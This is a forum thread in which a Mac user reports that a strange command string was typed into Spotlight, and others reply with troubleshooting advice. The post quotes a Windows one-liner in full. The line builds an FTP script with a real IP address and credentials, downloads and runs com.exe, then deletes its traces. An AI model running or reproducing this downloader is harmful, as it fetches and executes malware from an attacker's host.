Curious Mac Issue

Ok, so I am minding my own business and the browser freezes (mind you, was on Google.com), and spotlight gets the following entered into it:

echo open 87.230.22.187/https/img/ 21 >> ik &echo user zf Z@z1humensk1 >> ik &echo binary >> ik &echo get com.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &com.exe &exitecho You got owned

So, I know this is someone's lame attempt at a hack, but what gets me is how it has come into the system.

I have the normal firewall rules on and no unusual processes running. I was running through my WPA2 protected WIFI connection, but have jumped to hard wired for now and disabled the network for now.

I have not downloaded any questionable content from anywhere and stay updated. I went as far as to go in and install anti-virus on the Mac (even though some may consider it a moot point). Negative on the results. Of course, this sounds like a windows virus. No other windows systems were connected to the network at the time of this 'hack'.

Any ideas? Google returns ZERO results.

Seems like the hacker is pretty stupid since spotlight won't even execute that command heh. Not to mention that it was a Windows executable which can't really do much on your machine.

Normally something like a JavaScript could possibly execute this in the background on a Windows machine to take advantage of it... on Mac OS X, not so much. Just double-check your applications, make sure you don't have anything odd installed. If you are really concerned, make a new user account, which should isolate it further.

Firefox it was. But I don't see how that could have made much of a difference.

Anyway, I have since rebooted the machine due to a Safari Update Apple sent out to my system so hopefully if there was a "resident" program in line, then it would have terminated.

I knew the .exe was a windows executable, so I wasn't worried about that, except perhaps that the codeweavers crossover program is installed.